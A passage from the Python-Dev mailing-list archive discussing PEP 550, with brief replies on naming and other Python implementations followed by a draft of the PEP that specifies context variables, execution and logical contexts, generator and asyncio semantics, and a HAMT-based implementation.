Subject: [Python-Dev] PEP 550 and other python implementations
Message-ID:

Should PEP 550 discuss other implementations?  E.g., the object
space used in pypy?

-jJ

From ethan at stoneleaf.us  Fri Aug 25 22:19:32 2017
From: ethan at stoneleaf.us (Ethan Furman)
Date: Fri, 25 Aug 2017 19:19:32 -0700
Subject: [Python-Dev] PEP 550 v4
In-Reply-To:
References:
Message-ID: <59A0DAB4.2030807@stoneleaf.us>

All in all, I like it.  Nice job.

On 08/25/2017 03:32 PM, Yury Selivanov wrote:

> A *context variable* is an object representing a value in the
> execution context.  A new context variable is created by calling
> the ``new_context_var()`` function.  A context variable object has
> two methods:
>
> * ``lookup()``: returns the value of the variable in the current
>   execution context;
>
> * ``set()``: sets the value of the variable in the current
>   execution context.

Why "lookup" and not "get"?  Many APIs use "get" and its
functionality is well understood.

> Conceptually, an *execution context* (EC) is a stack of logical
> contexts.  There is one EC per Python thread.
>
> A *logical context* (LC) is a mapping of context variables to
> their values in that particular LC.

Still don't like the name of "logical context", but we can bike-shed
on that later.

--
~Ethan~

From jimjjewett at gmail.com  Fri Aug 25 22:26:29 2017
From: jimjjewett at gmail.com (Jim J. Jewett)
Date: Fri, 25 Aug 2017 22:26:29 -0400
Subject: [Python-Dev] PEP 550 leak-in vs leak-out, why not just a ChainMap
In-Reply-To:
References:
Message-ID:

On Aug 24, 2017 11:02 AM, "Yury Selivanov" wrote:

On Thu, Aug 24, 2017 at 10:05 AM, Jim J. Jewett wrote:
> On Thu, Aug 24, 2017 at 1:12 AM, Yury Selivanov
> On Thu, Aug 24, 2017
> at 12:32 AM, Jim J. Jewett wrote:

If you look at this small example:

    foo = new_context_key()

    async def nested():
        await asyncio.sleep(1)
        print(foo.get())

    async def outer():
        foo.set(1)
        await nested()
        foo.set(1000)

    l = asyncio.get_event_loop()
    l.create_task(outer())
    l.run_forever()

It will print "1", as the "nested()" coroutine will see the "foo"
key when it's awaited.

Now let's say we want to refactor this snippet and run the
"nested()" coroutine with a timeout:

    foo = new_context_key()

    async def nested():
        await asyncio.sleep(1)
        print(foo.get())

    async def outer():
        foo.set(1)
        await asyncio.wait_for(nested(), 10)  # !!!
        foo.set(1000)

    l = asyncio.get_event_loop()
    l.create_task(outer())
    l.run_forever()

So we wrap our `nested()` in a `wait_for()`, which creates a new
asynchronous task to run `nested()`.  That task will now execute on
its own, separately from the task that runs `outer()`.  So we need
to somehow capture the full EC at the moment `wait_for()` was
called, and use that EC to run `nested()` within it.  If we don't do
this, the refactored code would print "1000", instead of "1".

I would expect 1000 to be the right answer!  By the time it runs,
1000 (or mask_errors=false, to use a less toy example) is what its
own controlling scope requested.

If you are sure that you want the value frozen earlier, please make
this desire very explicit ... this example is the first I noticed
it.  And please explain what this means for things like signal or
warning masking.

ContextKey is declared once for the code that uses it.  Nobody else
will use that key.  Keys have names only for introspection purposes,
the implementation doesn't use it, iow:

    var = new_context_key('aaaaaa')
    var.set(1)
    # EC = [..., {var: 1}]
    # Note that the EC has the "var" object itself as the key in
    # the mapping, not "aaaaa".

This I had also not realized.  So effectively, the keys are based on
object identity, with some safeguards to ensure that even starting
with the same (interned) name will *not* produce the same object
unless you passed it around explicitly, or are in the same code unit
(file, typically).

This strikes me as reasonable, but still surprising.  (I think of
variables as typically named, rather than identified by address.)
So please make this more explicit as well.

-jJ

From jim.baker at python.org  Fri Aug 25 22:49:51 2017
From: jim.baker at python.org (Jim Baker)
Date: Fri, 25 Aug 2017 20:49:51 -0600
Subject: [Python-Dev] PEP 550 and other python implementations
In-Reply-To:
References:
Message-ID:

re other implementations: the model presented in
https://www.python.org/dev/peps/pep-0550/#implementation seems
perfectly compatible with Jython.  It's just one more thing we would
add to PyThreadState (which is what it's also called in the Jython
runtime).

On Fri, Aug 25, 2017 at 7:45 PM, Jim J. Jewett wrote:

> Should PEP 550 discuss other implementations?  E.g., the object
> space used in pypy?
>
> -jJ

From mertz at gnosis.cx  Sat Aug 26 00:56:57 2017
From: mertz at gnosis.cx (David Mertz)
Date: Fri, 25 Aug 2017 21:56:57 -0700
Subject: [Python-Dev] PEP 550 v4
In-Reply-To:
References:
Message-ID:

This is now looking really good and I can understand it.

One question though.  Sometimes creation of a context variable is
done with a name argument, other times not.  E.g.

    var1 = new_context_var('var1')
    var = new_context_var()

The signature is given as:

    sys.new_context_var(name: str)

But it seems like it should be:

    sys.new_context_var(name: Optional[str]=None)
During the rewrite, we realized that generators and coroutines should work with the EC in exactly the same way (coroutines used to be created with no LC in prior versions of the PEP). We also renamed Context Keys to Context Variables which seems to be a more appropriate name. Hopefully this update will resolve the remaining questions about the specification and the proposed implementation, and will allow us to focus on refining the API. Yury PEP: 550 Title: Execution Context Version: $Revision$ Last-Modified: $Date$ Author: Yury Selivanov , Elvis Pranskevichus Status: Draft Type: Standards Track Content-Type: text/x-rst Created: 11-Aug-2017 Python-Version: 3.7 Post-History: 11-Aug-2017, 15-Aug-2017, 18-Aug-2017, 25-Aug-2017 Abstract ======== This PEP adds a new generic mechanism of ensuring consistent access to non-local state in the context of out-of-order execution, such as in Python generators and coroutines. Thread-local storage, such as ``threading.local()``, is inadequate for programs that execute concurrently in the same OS thread. This PEP proposes a solution to this problem. Rationale ========= Prior to the advent of asynchronous programming in Python, programs used OS threads to achieve concurrency. The need for thread-specific state was solved by ``threading.local()`` and its C-API equivalent, ``PyThreadState_GetDict()``. A few examples of where Thread-local storage (TLS) is commonly relied upon: * Context managers like decimal contexts, ``numpy.errstate``, and ``warnings.catch_warnings``. * Request-related data, such as security tokens and request data in web applications, language context for ``gettext`` etc. * Profiling, tracing, and logging in large code bases. Unfortunately, TLS does not work well for programs which execute concurrently in a single thread. A Python generator is the simplest example of a concurrent program. Consider the following:: def fractions(precision, x, y): with decimal.localcontext() as ctx: ctx.prec = precision yield Decimal(x) / Decimal(y) yield Decimal(x) / Decimal(y**2) g1 = fractions(precision=2, x=1, y=3) g2 = fractions(precision=6, x=2, y=3) items = list(zip(g1, g2)) The expected value of ``items`` is:: [(Decimal('0.33'), Decimal('0.666667')), (Decimal('0.11'), Decimal('0.222222'))] Rather surprisingly, the actual result is:: [(Decimal('0.33'), Decimal('0.666667')), (Decimal('0.111111'), Decimal('0.222222'))] This is because Decimal context is stored as a thread-local, so concurrent iteration of the ``fractions()`` generator would corrupt the state. A similar problem exists with coroutines. Applications also often need to associate certain data with a given thread of execution. For example, a web application server commonly needs access to the current HTTP request object. The inadequacy of TLS in asynchronous code has lead to the proliferation of ad-hoc solutions, which are limited in scope and do not support all required use cases. The current status quo is that any library (including the standard library), which relies on TLS, is likely to be broken when used in asynchronous code or with generators (see [3]_ as an example issue.) Some languages, that support coroutines or generators, recommend passing the context manually as an argument to every function, see [1]_ for an example. This approach, however, has limited use for Python, where there is a large ecosystem that was built to work with a TLS-like context. Furthermore, libraries like ``decimal`` or ``numpy`` rely on context implicitly in overloaded operator implementations. 
The .NET runtime, which has support for async/await, has a generic solution for this problem, called ``ExecutionContext`` (see [2]_). Goals ===== The goal of this PEP is to provide a more reliable ``threading.local()`` alternative, which: * provides the mechanism and the API to fix non-local state issues with coroutines and generators; * has no or negligible performance impact on the existing code or the code that will be using the new mechanism, including libraries like ``decimal`` and ``numpy``. High-Level Specification ======================== The full specification of this PEP is broken down into three parts: * High-Level Specification (this section): the description of the overall solution. We show how it applies to generators and coroutines in user code, without delving into implementation details. * Detailed Specification: the complete description of new concepts, APIs, and related changes to the standard library. * Implementation Details: the description and analysis of data structures and algorithms used to implement this PEP, as well as the necessary changes to CPython. For the purpose of this section, we define *execution context* as an opaque container of non-local state that allows consistent access to its contents in the concurrent execution environment. A *context variable* is an object representing a value in the execution context. A new context variable is created by calling the ``new_context_var()`` function. A context variable object has two methods: * ``lookup()``: returns the value of the variable in the current execution context; * ``set()``: sets the value of the variable in the current execution context. Regular Single-threaded Code ---------------------------- In regular, single-threaded code that doesn't involve generators or coroutines, context variables behave like globals:: var = new_context_var() def sub(): assert var.lookup() == 'main' var.set('sub') def main(): var.set('main') sub() assert var.lookup() == 'sub' Multithreaded Code ------------------ In multithreaded code, context variables behave like thread locals:: var = new_context_var() def sub(): assert var.lookup() is None # The execution context is empty # for each new thread. var.set('sub') def main(): var.set('main') thread = threading.Thread(target=sub) thread.start() thread.join() assert var.lookup() == 'main' Generators ---------- In generators, changes to context variables are local and are not visible to the caller, but are visible to the code called by the generator. Once set in the generator, the context variable is guaranteed not to change between iterations:: var = new_context_var() def gen(): var.set('gen') assert var.lookup() == 'gen' yield 1 assert var.lookup() == 'gen' yield 2 def main(): var.set('main') g = gen() next(g) assert var.lookup() == 'main' var.set('main modified') next(g) assert var.lookup() == 'main modified' Changes to caller's context variables are visible to the generator (unless they were also modified inside the generator):: var = new_context_var() def gen(): assert var.lookup() == 'var' yield 1 assert var.lookup() == 'var modified' yield 2 def main(): g = gen() var.set('var') next(g) var.set('var modified') next(g) Now, let's revisit the decimal precision example from the `Rationale`_ section, and see how the execution context can improve the situation:: import decimal decimal_prec = new_context_var() # create a new context variable # Pre-PEP 550 Decimal relies on TLS for its context. 
# This subclass switches the decimal context storage # to the execution context for illustration purposes. # class MyDecimal(decimal.Decimal): def __init__(self, value="0"): prec = decimal_prec.lookup() if prec is None: raise ValueError('could not find decimal precision') context = decimal.Context(prec=prec) super().__init__(value, context=context) def fractions(precision, x, y): # Normally, this would be set by a context manager, # but for simplicity we do this directly. decimal_prec.set(precision) yield MyDecimal(x) / MyDecimal(y) yield MyDecimal(x) / MyDecimal(y**2) g1 = fractions(precision=2, x=1, y=3) g2 = fractions(precision=6, x=2, y=3) items = list(zip(g1, g2)) The value of ``items`` is:: [(Decimal('0.33'), Decimal('0.666667')), (Decimal('0.11'), Decimal('0.222222'))] which matches the expected result. Coroutines and Asynchronous Tasks --------------------------------- In coroutines, like in generators, context variable changes are local and are not visible to the caller:: import asyncio var = new_context_var() async def sub(): assert var.lookup() == 'main' var.set('sub') assert var.lookup() == 'sub' async def main(): var.set('main') await sub() assert var.lookup() == 'main' loop = asyncio.get_event_loop() loop.run_until_complete(main()) To establish the full semantics of execution context in couroutines, we must also consider *tasks*. A task is the abstraction used by *asyncio*, and other similar libraries, to manage the concurrent execution of coroutines. In the example above, a task is created implicitly by the ``run_until_complete()`` function. ``asyncio.wait_for()`` is another example of implicit task creation:: async def sub(): await asyncio.sleep(1) assert var.lookup() == 'main' async def main(): var.set('main') # waiting for sub() directly await sub() # waiting for sub() with a timeout await asyncio.wait_for(sub(), timeout=2) var.set('main changed') Intuitively, we expect the assertion in ``sub()`` to hold true in both invocations, even though the ``wait_for()`` implementation actually spawns a task, which runs ``sub()`` concurrently with ``main()``. Thus, tasks **must** capture a snapshot of the current execution context at the moment of their creation and use it to execute the wrapped coroutine whenever that happens. If this is not done, then innocuous looking changes like wrapping a coroutine in a ``wait_for()`` call would cause surprising breakage. This leads to the following:: import asyncio var = new_context_var() async def sub(): # Sleeping will make sub() run after # `var` is modified in main(). await asyncio.sleep(1) assert var.lookup() == 'main' async def main(): var.set('main') loop.create_task(sub()) # schedules asynchronous execution # of sub(). assert var.lookup() == 'main' var.set('main changed') loop = asyncio.get_event_loop() loop.run_until_complete(main()) In the above code we show how ``sub()``, running in a separate task, sees the value of ``var`` as it was when ``loop.create_task(sub())`` was called. Like tasks, the intuitive behaviour of callbacks scheduled with either ``Loop.call_soon()``, ``Loop.call_later()``, or ``Future.add_done_callback()`` is to also capture a snapshot of the current execution context at the point of scheduling, and use it to run the callback:: current_request = new_context_var() def log_error(e): logging.error('error when handling request %r', current_request.lookup()) async def render_response(): ... 
async def handle_get_request(request): current_request.set(request) try: return await render_response() except Exception as e: get_event_loop().call_soon(log_error, e) return '500 - Internal Server Error' Detailed Specification ====================== Conceptually, an *execution context* (EC) is a stack of logical contexts. There is one EC per Python thread. A *logical context* (LC) is a mapping of context variables to their values in that particular LC. A *context variable* is an object representing a value in the execution context. A new context variable object is created by calling the ``sys.new_context_var(name: str)`` function. The value of the ``name`` argument is not used by the EC machinery, but may be used for debugging and introspection. The context variable object has the following methods and attributes: * ``name``: the value passed to ``new_context_var()``. * ``lookup()``: traverses the execution context top-to-bottom, until the variable value is found. Returns ``None``, if the variable is not present in the execution context; * ``set()``: sets the value of the variable in the topmost logical context. Generators ---------- When created, each generator object has an empty logical context object stored in its ``__logical_context__`` attribute. This logical context is pushed onto the execution context at the beginning of each generator iteration and popped at the end:: var1 = sys.new_context_var('var1') var2 = sys.new_context_var('var2') def gen(): var1.set('var1-gen') var2.set('var2-gen') # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen', var2: 'var2-gen'}) # ] n = nested_gen() # nested_gen_LC is created next(n) # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen', var2: 'var2-gen'}) # ] var1.set('var1-gen-mod') var2.set('var2-gen-mod') # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'}) # ] next(n) def nested_gen(): # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen', var2: 'var2-gen'}), # nested_gen_LC() # ] assert var1.lookup() == 'var1-gen' assert var2.lookup() == 'var2-gen' var1.set('var1-nested-gen') # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen', var2: 'var2-gen'}), # nested_gen_LC({var1: 'var1-nested-gen'}) # ] yield # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'}), # nested_gen_LC({var1: 'var1-nested-gen'}) # ] assert var1.lookup() == 'var1-nested-gen' assert var2.lookup() == 'var2-gen-mod' yield # EC = [outer_LC()] g = gen() # gen_LC is created for the generator object `g` list(g) # EC = [outer_LC()] The snippet above shows the state of the execution context stack throughout the generator lifespan. contextlib.contextmanager ------------------------- Earlier, we've used the following example:: import decimal # create a new context variable decimal_prec = sys.new_context_var('decimal_prec') # ... 
def fractions(precision, x, y): decimal_prec.set(precision) yield MyDecimal(x) / MyDecimal(y) yield MyDecimal(x) / MyDecimal(y**2) Let's extend it by adding a context manager:: @contextlib.contextmanager def precision_context(prec): old_rec = decimal_prec.lookup() try: decimal_prec.set(prec) yield finally: decimal_prec.set(old_prec) Unfortunately, this would not work straight away, as the modification to the ``decimal_prec`` variable is contained to the ``precision_context()`` generator, and therefore will not be visible inside the ``with`` block:: def fractions(precision, x, y): # EC = [{}, {}] with precision_context(precision): # EC becomes [{}, {}, {decimal_prec: precision}] in the # *precision_context()* generator, # but here the EC is still [{}, {}] # raises ValueError('could not find decimal precision')! yield MyDecimal(x) / MyDecimal(y) yield MyDecimal(x) / MyDecimal(y**2) The way to fix this is to set the generator's ``__logical_context__`` attribute to ``None``. This will cause the generator to avoid modifying the execution context stack. We modify the ``contextlib.contextmanager()`` decorator to set ``genobj.__logical_context__`` to ``None`` to produce well-behaved context managers:: def fractions(precision, x, y): # EC = [{}, {}] with precision_context(precision): # EC = [{}, {decimal_prec: precision}] yield MyDecimal(x) / MyDecimal(y) yield MyDecimal(x) / MyDecimal(y**2) # EC becomes [{}, {decimal_prec: None}] asyncio ------- ``asyncio`` uses ``Loop.call_soon``, ``Loop.call_later``, and ``Loop.call_at`` to schedule the asynchronous execution of a function. ``asyncio.Task`` uses ``call_soon()`` to further the execution of the wrapped coroutine. We modify ``Loop.call_{at,later,soon}`` to accept the new optional *execution_context* keyword argument, which defaults to the copy of the current execution context:: def call_soon(self, callback, *args, execution_context=None): if execution_context is None: execution_context = sys.get_execution_context() # ... some time later sys.run_with_execution_context( execution_context, callback, args) The ``sys.get_execution_context()`` function returns a shallow copy of the current execution context. By shallow copy here we mean such a new execution context that: * lookups in the copy provide the same results as in the original execution context, and * any changes in the original execution context do not affect the copy, and * any changes to the copy do not affect the original execution context. Either of the following satisfy the copy requirements: * a new stack with shallow copies of logical contexts; * a new stack with one squashed logical context. The ``sys.run_with_execution_context(ec, func, *args, **kwargs)`` function runs ``func(*args, **kwargs)`` with *ec* as the execution context. The function performs the following steps: 1. Set *ec* as the current execution context stack in the current thread. 2. Push an empty logical context onto the stack. 3. Run ``func(*args, **kwargs)``. 4. Pop the logical context from the stack. 5. Restore the original execution context stack. 6. Return or raise the ``func()`` result. These steps ensure that *ec* cannot be modified by *func*, which makes ``run_with_execution_context()`` idempotent. ``asyncio.Task`` is modified as follows:: class Task: def __init__(self, coro): ... # Get the current execution context snapshot. self._exec_context = sys.get_execution_context() self._loop.call_soon( self._step, execution_context=self._exec_context) def _step(self, exc=None): ... 
            self._loop.call_soon(
                self._step,
                execution_context=self._exec_context)
            ...

Generators Transformed into Iterators
-------------------------------------

Any Python generator can be represented as an equivalent iterator.  Compilers like Cython rely on this axiom.  With respect to the execution context, such an iterator should behave the same way as the generator it represents.

This means that there needs to be a Python API to create new logical contexts and to run code with a given logical context.

The ``sys.new_logical_context()`` function creates a new empty logical context.

The ``sys.run_with_logical_context(lc, func, *args, **kwargs)`` function can be used to run functions in the specified logical context.  The *lc* can be modified as a result of the call.

The ``sys.run_with_logical_context()`` function performs the following steps:

1. Push *lc* onto the current execution context stack.
2. Run ``func(*args, **kwargs)``.
3. Pop *lc* from the execution context stack.
4. Return or raise the ``func()`` result.

By using ``new_logical_context()`` and ``run_with_logical_context()``, we can replicate the generator behaviour like this::

    class Generator:

        def __init__(self):
            self.logical_context = sys.new_logical_context()

        def __iter__(self):
            return self

        def __next__(self):
            return sys.run_with_logical_context(
                self.logical_context, self._next_impl)

        def _next_impl(self):
            # Actual __next__ implementation.
            ...

Let's see how this pattern can be applied to a real generator::

    # create a new context variable
    decimal_prec = sys.new_context_var('decimal_precision')

    def gen_series(n, precision):
        decimal_prec.set(precision)
        for i in range(1, n):
            yield MyDecimal(i) / MyDecimal(3)

    # gen_series is equivalent to the following iterator:

    class Series:

        def __init__(self, n, precision):
            # Create a new empty logical context on creation,
            # like the generators do.
            self.logical_context = sys.new_logical_context()

            # run_with_logical_context() pushes
            # self.logical_context onto the execution context stack,
            # runs self._init, and pops self.logical_context
            # from the stack.
            sys.run_with_logical_context(
                self.logical_context, self._init, n, precision)

        def _init(self, n, precision):
            self.i = 1
            self.n = n
            decimal_prec.set(precision)

        def __iter__(self):
            return self

        def __next__(self):
            return sys.run_with_logical_context(
                self.logical_context, self._next_impl)

        def _next_impl(self):
            # decimal_prec is already set in self.logical_context,
            # which run_with_logical_context() pushed onto the stack.
            result = MyDecimal(self.i) / MyDecimal(3)
            self.i += 1
            return result

For regular iterators such an approach to logical context management is normally not necessary, and it is recommended to set and restore context variables directly in ``__next__``::

    class Series:

        def __next__(self):
            old_prec = decimal_prec.lookup()
            try:
                decimal_prec.set(self.precision)
                ...
            finally:
                decimal_prec.set(old_prec)

Asynchronous Generators
-----------------------

The execution context semantics in asynchronous generators do not differ from those of regular generators and coroutines.

Implementation
==============

Execution context is implemented as an immutable linked list of logical contexts, where each logical context is an immutable weak key mapping.
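To make this shape concrete, here is a minimal pure-Python model of such a structure.  This is an illustrative sketch only: the ``ECNode`` class and the ``ec_set()`` / ``ec_lookup()`` helpers are hypothetical names, and the real implementation uses C-level structures and a HAMT instead of ``dict`` copies (see below)::

    import types

    class ECNode:
        """One node of the execution context: an immutable logical
        context plus a link to the node below it on the stack."""

        __slots__ = ('prev', 'lc')

        def __init__(self, prev, lc):
            self.prev = prev                      # next node down, or None
            self.lc = types.MappingProxyType(lc)  # read-only mapping

    def ec_set(top, var, value):
        # "Mutation" returns a new top node; the old chain is left
        # untouched, so snapshots taken earlier keep their values.
        new_lc = dict(top.lc)
        new_lc[var] = value
        return ECNode(top.prev, new_lc)

    def ec_lookup(top, var):
        # Traverse the stack top-to-bottom until the variable is found.
        node = top
        while node is not None:
            if var in node.lc:
                return node.lc[var]
            node = node.prev
        return None

    # Usage: build [outer_LC, gen_LC], then set a variable in the
    # topmost LC.
    outer = ECNode(None, {'var1': 'outer'})
    top = ECNode(outer, {})
    top = ec_set(top, 'var1', 'gen')
    assert ec_lookup(top, 'var1') == 'gen'
    assert ec_lookup(outer, 'var1') == 'outer'  # old snapshot unaffected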
A pointer to the currently active execution context is stored in the OS thread state::

    +-----------------+
    |                 |  ec
    |  PyThreadState  +---------------------------------------------+
    |                 |                                             |
    +-----------------+                                             |
                                                                    |
         ec_node                ec_node               ec_node       v
    +------+------+        +------+------+        +------+------+
    | NULL |  lc  | <----- | prev |  lc  | <----- | prev |  lc  |
    +------+--+---+        +------+--+---+        +------+--+---+
              |                      |                      |
        LC    v                LC    v                LC    v
    +--------------+       +--------------+       +--------------+
    |  var1: obj1  |       |    EMPTY     |       |  var1: obj4  |
    |  var2: obj2  |       +--------------+       +--------------+
    |  var3: obj3  |
    +--------------+

The choice of the immutable list of immutable mappings as a fundamental data structure is motivated by the need to efficiently implement ``sys.get_execution_context()``, which is to be frequently used by asynchronous tasks and callbacks.  When the EC is immutable, ``get_execution_context()`` can simply copy the current execution context *by reference*::

    def get_execution_context():
        return PyThreadState_Get().ec

Let's review all possible context modification scenarios:

* The ``ContextVar.set()`` method is called::

    def ContextVar_set(self, val):
        # See a more complete set() definition
        # in the `Context Variables` section.

        tstate = PyThreadState_Get()

        top_ec_node = tstate.ec
        top_lc = top_ec_node.lc
        new_top_lc = top_lc.set(self, val)
        tstate.ec = ec_node(
            prev=top_ec_node.prev, lc=new_top_lc)

* ``sys.run_with_logical_context()`` is called, in which case the passed logical context object is appended to the execution context::

    def run_with_logical_context(lc, func, *args, **kwargs):
        tstate = PyThreadState_Get()

        old_top_ec_node = tstate.ec
        new_top_ec_node = ec_node(prev=old_top_ec_node, lc=lc)

        try:
            tstate.ec = new_top_ec_node
            return func(*args, **kwargs)
        finally:
            tstate.ec = old_top_ec_node

* ``sys.run_with_execution_context()`` is called, in which case the current execution context is set to the passed execution context with a new empty logical context appended to it::

    def run_with_execution_context(ec, func, *args, **kwargs):
        tstate = PyThreadState_Get()

        old_top_ec_node = tstate.ec
        new_lc = sys.new_logical_context()
        new_top_ec_node = ec_node(prev=ec, lc=new_lc)

        try:
            tstate.ec = new_top_ec_node
            return func(*args, **kwargs)
        finally:
            tstate.ec = old_top_ec_node

* ``genobj.send()``, ``genobj.throw()``, or ``genobj.close()`` is called on a ``genobj`` generator, in which case the logical context recorded in ``genobj`` is pushed onto the stack::

    PyGen_New(PyGenObject *gen):
        gen.__logical_context__ = sys.new_logical_context()

    gen_send(PyGenObject *gen, ...):
        tstate = PyThreadState_Get()

        if gen.__logical_context__ is not None:
            old_top_ec_node = tstate.ec
            new_top_ec_node = ec_node(
                prev=old_top_ec_node,
                lc=gen.__logical_context__)

            try:
                tstate.ec = new_top_ec_node
                return _gen_send_impl(gen, ...)
            finally:
                gen.__logical_context__ = tstate.ec.lc
                tstate.ec = old_top_ec_node
        else:
            return _gen_send_impl(gen, ...)

* Coroutines and asynchronous generators share the implementation with generators, and the above changes apply to them as well.

In certain scenarios the EC may need to be squashed to limit the size of the chain.  For example, consider the following corner case::

    async def repeat(coro, delay):
        await coro()
        await asyncio.sleep(delay)
        loop.create_task(repeat(coro, delay))

    async def ping():
        print('ping')

    loop = asyncio.get_event_loop()
    loop.create_task(repeat(ping, 1))
    loop.run_forever()

In the above code, the EC chain keeps growing for as long as ``repeat()`` keeps rescheduling itself.
Each new task will call ``sys.run_with_execution_context()``, which will append a new logical context to the chain.  To prevent unbounded growth, ``sys.get_execution_context()`` checks if the chain is longer than a predetermined maximum, and if it is, squashes the chain into a single LC::

    def get_execution_context():
        tstate = PyThreadState_Get()

        if tstate.ec_len > EC_LEN_MAX:
            squashed_lc = sys.new_logical_context()

            node = tstate.ec
            while node:
                # The LC.merge() method does not replace existing keys.
                squashed_lc = squashed_lc.merge(node.lc)
                node = node.prev

            return ec_node(prev=NULL, lc=squashed_lc)
        else:
            return tstate.ec

Logical Context
---------------

Logical context is an immutable weak key mapping which has the following properties with respect to garbage collection:

* ``ContextVar`` objects are strongly-referenced only from the application code, not from any of the Execution Context machinery or values they point to.  This means that there are no reference cycles that could extend their lifespan longer than necessary, or prevent their collection by the GC.

* Values put in the Execution Context are guaranteed to be kept alive while there is a ``ContextVar`` key referencing them in the thread.

* If a ``ContextVar`` is garbage collected, all of its values will be removed from all contexts, allowing them to be GCed if needed.

* If a thread has ended its execution, its thread state will be cleaned up along with its ``ExecutionContext``, cleaning up all values bound to all context variables in the thread.

As discussed earlier, we need ``sys.get_execution_context()`` to be consistently fast regardless of the size of the execution context, so logical context is necessarily an immutable mapping.

Choosing ``dict`` for the underlying implementation is suboptimal, because ``LC.set()`` will cause ``dict.copy()``, which is an O(N) operation, where *N* is the number of items in the LC.

``get_execution_context()``, when squashing the EC, is an O(M) operation, where *M* is the total number of context variable values in the EC.

So, instead of ``dict``, we choose Hash Array Mapped Trie (HAMT) as the underlying implementation of logical contexts.  (Scala and Clojure use HAMT to implement high-performance immutable collections [5]_, [6]_.)

With HAMT ``.set()`` becomes an O(log N) operation, and ``get_execution_context()`` squashing is more efficient on average due to structural sharing in HAMT.

See `Appendix: HAMT Performance Analysis`_ for a more elaborate analysis of HAMT performance compared to ``dict``.

Context Variables
-----------------

The ``ContextVar.lookup()`` and ``ContextVar.set()`` methods are implemented as follows (in pseudo-code)::

    class ContextVar:

        def lookup(self):
            tstate = PyThreadState_Get()

            ec_node = tstate.ec
            while ec_node:
                if self in ec_node.lc:
                    return ec_node.lc[self]
                ec_node = ec_node.prev

            return None

        def set(self, value):
            tstate = PyThreadState_Get()
            top_ec_node = tstate.ec

            if top_ec_node is not None:
                top_lc = top_ec_node.lc
                new_top_lc = top_lc.set(self, value)
                tstate.ec = ec_node(
                    prev=top_ec_node.prev, lc=new_top_lc)
            else:
                top_lc = sys.new_logical_context()
                new_top_lc = top_lc.set(self, value)
                tstate.ec = ec_node(
                    prev=NULL, lc=new_top_lc)

For efficient access in performance-sensitive code paths, such as in ``numpy`` and ``decimal``, we add a cache to ``ContextVar.lookup()``, making it an O(1) operation when the cache is hit.  The cache key is composed from the following:

* The new ``uint64_t PyThreadState->unique_id``, which is a globally unique thread state identifier.
  It is computed from the new ``uint64_t PyInterpreterState->ts_counter``, which is incremented whenever a new thread state is created.

* The ``uint64_t ContextVar->version`` counter, which is incremented whenever the context variable value is changed in any logical context in any thread.

The cache is then implemented as follows::

    class ContextVar:

        def set(self, value):
            ...  # implementation
            self.version += 1

        def lookup(self):
            tstate = PyThreadState_Get()

            if (self.last_tstate_id == tstate.unique_id and
                    self.last_version == self.version):
                return self.last_value

            value = self._lookup_uncached()

            self.last_value = value  # borrowed ref
            self.last_tstate_id = tstate.unique_id
            self.last_version = self.version

            return value

Note that ``last_value`` is a borrowed reference.  The assumption is that if the version checks are fine, the object will be alive.  This allows the values of context variables to be properly garbage collected.

This generic caching approach is similar to what the current C implementation of ``decimal`` does to cache the current decimal context, and has similar performance characteristics.

Performance Considerations
==========================

Tests of the reference implementation based on the prior revisions of this PEP have shown 1-2% slowdown on generator microbenchmarks and no noticeable difference in macrobenchmarks.

The performance of non-generator and non-async code is not affected by this PEP.

Summary of the New APIs
=======================

Python
------

The following new Python APIs are introduced by this PEP:

1. The ``sys.new_context_var(name: str)`` function to create ``ContextVar`` objects.

2. The ``ContextVar`` object, which has:

   * the read-only ``.name`` attribute,
   * the ``.lookup()`` method, which returns the value of the variable in the current execution context;
   * the ``.set()`` method, which sets the value of the variable in the current execution context.

3. The ``sys.get_execution_context()`` function, which returns a copy of the current execution context.

4. The ``sys.new_execution_context()`` function, which returns a new empty execution context.

5. The ``sys.new_logical_context()`` function, which returns a new empty logical context.

6. The ``sys.run_with_execution_context(ec: ExecutionContext, func, *args, **kwargs)`` function, which runs *func* with the provided execution context.

7. The ``sys.run_with_logical_context(lc: LogicalContext, func, *args, **kwargs)`` function, which runs *func* with the provided logical context on top of the current execution context.

C API
-----

1. ``PyContextVar * PyContext_NewVar(char *desc)``: create a ``PyContextVar`` object.

2. ``PyObject * PyContext_LookupVar(PyContextVar *)``: return the value of the variable in the current execution context.

3. ``int PyContext_SetVar(PyContextVar *, PyObject *)``: set the value of the variable in the current execution context.

4. ``PyLogicalContext * PyLogicalContext_New()``: create a new empty ``PyLogicalContext``.

5. ``PyExecutionContext * PyExecutionContext_New()``: create a new empty ``PyExecutionContext``.

6. ``PyExecutionContext * PyExecutionContext_Get()``: return the current execution context.

7. ``int PyExecutionContext_Set(PyExecutionContext *)``: set the passed EC object as the current one for the active thread state.

8. ``int PyExecutionContext_SetWithLogicalContext(PyExecutionContext *, PyLogicalContext *)``: makes it possible to implement the ``sys.run_with_logical_context`` Python API.

Design Considerations
=====================

Should ``PyThreadState_GetDict()`` use the execution context?
--------------------------------------------------------------

No.  ``PyThreadState_GetDict`` is based on TLS, and changing its semantics will break backwards compatibility.

PEP 521
-------

:pep:`521` proposes an alternative solution to the problem, which extends the context manager protocol with two new methods: ``__suspend__()`` and ``__resume__()``.  Similarly, the asynchronous context manager protocol is also extended with ``__asuspend__()`` and ``__aresume__()``.

This allows implementing context managers that manage non-local state, which behave correctly in generators and coroutines.

For example, consider the following context manager, which stores its state in the execution context::

    class Context:

        def __init__(self):
            self.var = new_context_var('var')

        def __enter__(self):
            self.old_x = self.var.lookup()
            self.var.set('something')

        def __exit__(self, *err):
            self.var.set(self.old_x)

An equivalent implementation with PEP 521::

    local = threading.local()

    class Context:

        def __enter__(self):
            self.old_x = getattr(local, 'x', None)
            local.x = 'something'

        def __suspend__(self):
            local.x = self.old_x

        def __resume__(self):
            local.x = 'something'

        def __exit__(self, *err):
            local.x = self.old_x

The downside of this approach is the addition of significant new complexity to the context manager protocol and the interpreter implementation.  This approach is also likely to negatively impact the performance of generators and coroutines.

Additionally, the solution in :pep:`521` is limited to context managers, and does not provide any mechanism to propagate state in asynchronous tasks and callbacks.

Can Execution Context be implemented outside of CPython?
--------------------------------------------------------

